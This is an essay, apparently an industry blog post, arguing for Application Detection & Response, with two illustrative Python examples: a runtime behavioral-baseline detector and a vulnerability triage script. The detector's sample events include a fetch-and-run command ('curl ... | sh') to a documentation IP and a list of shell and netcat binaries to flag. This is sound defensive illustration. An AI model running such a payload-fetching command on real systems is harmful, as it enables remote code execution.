How ADR Addresses Gaps in the Detection & Response Landscape
A look at the emerging category of "Application Detection & Response (ADR)"
The concept of detection and response is far from new in cybersecurity. In fact, it is a core part of the NIST Cybersecurity Framework (CSF) and fundamental part of any sound cybersecurity program.
Source: NIST CSF
You must be able to both detect threats and malicious activity, and respond to them, regardless of where they occur. That’s where the challenge comes into play with the current Detection and Response landscape.
As we will discuss below, most detection and response tooling has focused on endpoints, networks, servers and similar assets. All of those need coverage, but one gap has largely been left open: applications. That gap is increasingly being targeted as applications play a growing role in malicious activity.
For example, the latest Verizon Data Breach Investigations Report (DBIR) pointed out that while traditional attack vectors such as credential compromise and phishing still lead the pack, vulnerability exploitation grew 180% over the previous year's report. Verizon stated that exploitation of vulnerabilities now accounts for roughly one third of the incidents the DBIR sees.
Source: 2024 Verizon DBIR
Similarly, Mandiant’s M-Trend report for 2024 identified that exploitation represented the most prevalent initial attack vector for intrusions, playing a role in 38% of initial intrusions.
Source: Mandiant M-Trends 2024 Special Report
Endpoint Centric
We’ve got entire security product categories aimed at Detection and Response, such as Endpoint Detection & Response (EDR), Managed Detection and Response (MDR) and Extended Detection and Response (XDR). Rightfully so, as we have seen massive growth of trends such as the remote/distributed workforce, bring-your-own-device (BYoD) and more, all of which warrant attention on endpoints.
Attention on the network, endpoints, cloud and data makes sense, but as the reports cited above show, attackers are increasingly targeting applications and their vulnerabilities for exploitation. That argues for a detection and response capability that treats applications and their threats as a first-class priority.
Challenging Application Security Landscape
There are also several challenges in the AppSec landscape that further warrant a focus on ADR. They include the always fuzzy “shared responsibility model”, complexity of distributed systems and the ever increasing velocity of change.
In the shared responsibility model there is not only the underlying cloud service provider (CSP) to consider, but also external SaaS integrations, internal development and platform teams, and autonomous teams across the organization, often leaving opaque seams where it is unclear where one party's responsibility ends and another's begins. Add to that the third-party dependencies, components and vulnerabilities that must be addressed.
The distributed nature of modern systems also creates more opportunities for exploitation and abuse. One example is the reliance on external authentication and identity providers: each is a potential attack vector, yet you have limited visibility into them because you own neither the underlying infrastructure nor its logging.
Last but not least, we are dealing with an ever-increasing velocity of change. As the industry adopts more DevOps practices and automation, software delivery cycles keep accelerating, and GenAI-driven coding assistants will only increase that pace. This makes it hard for security tools to detect and respond to attacks, because they struggle to distinguish benign from malicious application behavior when the baseline itself changes with every deploy.
While tools such as Web Application Firewalls (WAF) and Runtime Application Self Protection (RASP) have historically been used to secure applications, they have their own drawbacks and challenges, such as maintaining complex constantly changing rulesets or being cumbersome to the point where they may impact application performance.
Modern Application Complexity
Modern applications can be incredibly complex, involving underlying hosting environments, Infrastructure-as-a-Service (IaaS) providers, Kubernetes, Containers, Microservices and various API calls. All of this complexity can be difficult to address with tools that don’t account for the full runtime context of applications.
Using application context (service interactions, data flows and authentication activity) helps you spot unexpected and potentially malicious behavior, and also prepares you to quickly contain, mitigate and remediate it, limiting the blast radius and impact of an incident.
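To make the idea concrete, here is an added example (not code from the original article or from any ADR product) of a behavioral baseline built from application runtime telemetry. It learns which service-to-service edges, spawned processes, outbound hosts and caller types are normal from a benign window, then flags departures: an anonymous caller hitting a path that only authenticated users ever used, a never-seen service edge, a web service spawning a shell, and egress to an unknown host. All service names, paths, hosts and events are constructed for illustration, and the rules are deliberately simple.

```python
# Added example, not code from the original article or any ADR product.
# A behavioral baseline over constructed runtime telemetry: service-to-service
# calls (with the calling principal), process executions and outbound
# connections. Every service name, path, host and event below is made up.
from collections import defaultdict

# Interpreters that a web/API service almost never needs to spawn itself;
# seeing one appear is a classic post-exploitation (RCE, webshell) indicator.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "nc", "python3", "perl"}

# Constructed benign traffic from a learning window.
BASELINE_EVENTS = [
    {"kind": "call", "src": "web", "dst": "orders", "path": "/orders", "principal": "user:alice"},
    {"kind": "call", "src": "web", "dst": "orders", "path": "/orders", "principal": "user:carol"},
    {"kind": "call", "src": "orders", "dst": "payments", "path": "/charge", "principal": "svc:orders"},
    {"kind": "call", "src": "web", "dst": "catalog", "path": "/items", "principal": "anon"},
    {"kind": "exec", "service": "orders", "argv": ["/usr/bin/wkhtmltopdf", "invoice.html"]},
    {"kind": "connect", "service": "orders", "host": "payments.internal"},
]

# Constructed events from a later window that contains an intrusion.
SUSPICIOUS_EVENTS = [
    # Known edge, but an anonymous caller reaches a path only authenticated users hit before.
    {"kind": "call", "src": "web", "dst": "orders", "path": "/orders", "principal": "anon"},
    # A service-to-service edge never observed in the baseline.
    {"kind": "call", "src": "orders", "dst": "payments", "path": "/admin/refund", "principal": "svc:orders"},
    # The orders service spawning a shell that fetches a payload.
    {"kind": "exec", "service": "orders", "argv": ["/bin/sh", "-c", "curl http://203.0.113.7/x | sh"]},
    # ...and phoning home to an address it has never contacted.
    {"kind": "connect", "service": "orders", "host": "203.0.113.7"},
    # Ordinary traffic that must not alert.
    {"kind": "call", "src": "web", "dst": "orders", "path": "/orders", "principal": "user:bob"},
]


def principal_kind(principal):
    """'user:alice' -> 'user', 'svc:orders' -> 'svc', 'anon' -> 'anon'."""
    return principal.split(":", 1)[0]


def basename(path):
    return path.rsplit("/", 1)[-1]


def learn_baseline(events):
    """Summarize a window of benign runtime events into sets of expected behavior."""
    baseline = {
        "calls": set(),                 # (src, dst, path) edges seen
        "execs": defaultdict(set),      # service -> binaries it normally spawns
        "egress": defaultdict(set),     # service -> hosts it normally connects to
        "auth": defaultdict(set),       # (dst, path) -> principal kinds that called it
    }
    for e in events:
        if e["kind"] == "call":
            baseline["calls"].add((e["src"], e["dst"], e["path"]))
            baseline["auth"][(e["dst"], e["path"])].add(principal_kind(e["principal"]))
        elif e["kind"] == "exec":
            baseline["execs"][e["service"]].add(basename(e["argv"][0]))
        elif e["kind"] == "connect":
            baseline["egress"][e["service"]].add(e["host"])
    return baseline


def detect(baseline, events):
    """Return (rule, severity, event) for each event that departs from the baseline."""
    findings = []
    for e in events:
        if e["kind"] == "call":
            edge = (e["src"], e["dst"], e["path"])
            if edge not in baseline["calls"]:
                findings.append(("unexpected_call", "medium", e))
            seen_kinds = baseline["auth"].get((e["dst"], e["path"]))
            # Authentication context: a path that only ever served authenticated
            # principals is suddenly reached anonymously.
            if seen_kinds and "anon" not in seen_kinds and principal_kind(e["principal"]) == "anon":
                findings.append(("auth_bypass_suspected", "high", e))
        elif e["kind"] == "exec":
            binary = basename(e["argv"][0])
            if binary not in baseline["execs"].get(e["service"], set()):
                severity = "critical" if binary in INTERPRETERS else "medium"
                findings.append(("unexpected_exec", severity, e))
        elif e["kind"] == "connect":
            if e["host"] not in baseline["egress"].get(e["service"], set()):
                findings.append(("unexpected_egress", "high", e))
    return findings


if __name__ == "__main__":
    for rule, severity, event in detect(learn_baseline(BASELINE_EVENTS), SUSPICIOUS_EVENTS):
        print(f"[{severity}] {rule}: {event}")
```

The point of the example is the shape of the signal, not the rules themselves: each alert is tied to a specific service, caller and action, which is exactly the context an incident responder needs to contain quickly (revoke that service's credentials, block that egress, roll that deployment). A real baseline would be learned continuously and re-keyed on each deploy, since, as noted above, frequent change is what makes static rulesets drift.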
Vulnerability and Exploitation Context
Compounding the noise and developer toil that scanning tools generate is the reality that the overwhelming majority of vulnerability scanning tools lack the full context of the running application.
We know from sources such as Cyentia that only 4-6% of all vulnerabilities discovered are ever actually exploited.
Source: Cyentia’s Inaugural Study of EPSS Data and Performance
Some modern tools such as SCA are adding capabilities to flag whether a vulnerability is known to be exploited (using sources such as the CISA Known Exploited Vulnerabilities (KEV) catalog), likely to be exploited (using the Exploit Prediction Scoring System (EPSS)), or actually exploitable in this code base (using reachability analysis). The runtime context an ADR platform brings adds a further layer on top of those signals.
Given that AppSec resources in most organizations are already stretched thin, with developers far outnumbering security staff and focused on competing priorities such as deployment velocity, the need to concentrate on what matters (the vulnerabilities that truly pose risk and can actually be exploited) is all the more pressing.
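As an added example (not from the original article or any vendor's product), the following triage combines SCA findings with the three signals just described (KEV membership, EPSS score, static reachability) and then layers on the runtime context an ADR platform would contribute: whether the vulnerable module is actually loaded in a running process and whether that process faces the internet. The vulnerability identifiers, packages, scores and the KEV/EPSS data are all constructed stand-ins, and the tiering rule is one reasonable policy, not a standard.

```python
# Added example, not from the original article or any vendor's product. It combines
# SCA findings with CISA KEV membership, EPSS scores and static reachability, then
# adds the runtime context an ADR platform would contribute (is the vulnerable
# module actually loaded, does that process face the internet). Vulnerability IDs,
# packages, scores and the KEV/EPSS data are all constructed for illustration.
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    vuln_id: str           # constructed identifier, not a real CVE
    package: str
    cvss: float
    reachable: bool        # SCA reachability: app code calls the vulnerable function
    runtime_loaded: bool   # ADR context: the module is loaded in a running process
    internet_facing: bool  # ADR context: that process serves external traffic


# Constructed stand-ins for the CISA KEV catalog and the EPSS feed.
KEV = {"VULN-0002"}
EPSS = {"VULN-0001": 0.91, "VULN-0002": 0.35, "VULN-0003": 0.02, "VULN-0004": 0.88}

# Constructed SCA output for one application.
FINDINGS = [
    Finding("VULN-0001", "libparse", 9.8, reachable=True, runtime_loaded=False, internet_facing=False),
    Finding("VULN-0002", "authlib", 8.1, reachable=True, runtime_loaded=True, internet_facing=True),
    Finding("VULN-0003", "imgproc", 7.5, reachable=False, runtime_loaded=True, internet_facing=True),
    Finding("VULN-0004", "jsonutil", 9.1, reachable=True, runtime_loaded=True, internet_facing=False),
]

TIER_ORDER = {"P0": 0, "P1": 1, "P2": 2, "P3": 3}


def triage(f, kev, epss, epss_threshold=0.1):
    """Assign a priority tier and a human-readable reason to one finding."""
    score = epss.get(f.vuln_id, 0.0)
    # Runtime context first: a module the running application never loads is not
    # exploitable in that deployment, however high its CVSS score looks in the scanner.
    if not f.runtime_loaded:
        return "P3", "vulnerable module never loaded at runtime; fix in the normal patch cycle"
    if f.vuln_id in kev:
        return "P0", "known exploited (KEV) and loaded in a running process"
    if f.reachable and f.internet_facing and (score >= epss_threshold or f.cvss >= 9.0):
        return "P1", "reachable from app code in an internet-facing process with high exploit likelihood"
    if f.reachable or score >= epss_threshold:
        return "P2", "reachable or likely to be exploited, but not externally exposed"
    return "P3", "loaded but unreachable and unlikely to be exploited"


def prioritize(findings, kev, epss):
    """Return findings as (tier, reason, finding), most urgent first."""
    triaged = [(*triage(f, kev, epss), f) for f in findings]
    triaged.sort(key=lambda t: (TIER_ORDER[t[0]], -epss.get(t[2].vuln_id, 0.0)))
    return triaged


if __name__ == "__main__":
    for tier, reason, f in prioritize(FINDINGS, KEV, EPSS):
        print(f"{tier} {f.vuln_id} {f.package} (CVSS {f.cvss}): {reason}")
```

Note how the ordering differs from a CVSS sort: the 9.8 in a library the process never loads drops to the bottom, while the 8.1 that is both in KEV and live in an exposed process goes to the top. That is the "focus on what matters" argument in code form. The runtime-loaded check is a coarse proxy (a module can be loaded lazily, and a deployment can change), so in practice it should be re-evaluated continuously rather than computed once at scan time.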
Hyper Focus on Shifting “Left”
If you have paid any attention to cybersecurity over the last several years, you have seen the big push to "shift security left" as part of trends such as DevSecOps. The theory was, and is, that it is cheaper and more effective to identify and remediate vulnerabilities earlier in the software development lifecycle (SDLC), both because they are cheaper to fix there and because it happens before they reach production runtime environments where malicious actors can exploit them.
We’ve seen a proliferation of security scanning tools focused on these activities such as Static/Dynamic Application Security Testing (SAST/DAST), Software Composition Analysis (SCA), Secrets, Container Scanning, and more. While all of these tools have their place, the challenge is that runtime (reality) often can look much different than source or build phases in the SDLC, and they can often lack context of how complex applications work when running in production environments.
Additionally, many of these tools produce hundreds or thousands of findings, many of which lack context and must be analyzed, discussed and addressed by engineering and development teams, draining scarce resources and adding lag to key metrics such as mean time to deploy, i.e. how quickly developers can get code, features and innovations into products and applications.
It isn’t that tools that focus on securing pre-runtime environments aren’t needed or effective as part of a modern application security program, but they aren’t sufficient on their own, hence leaving the gap of runtime Application Detection & Response (ADR).
While we’re looking left, attackers are looking right - right at production.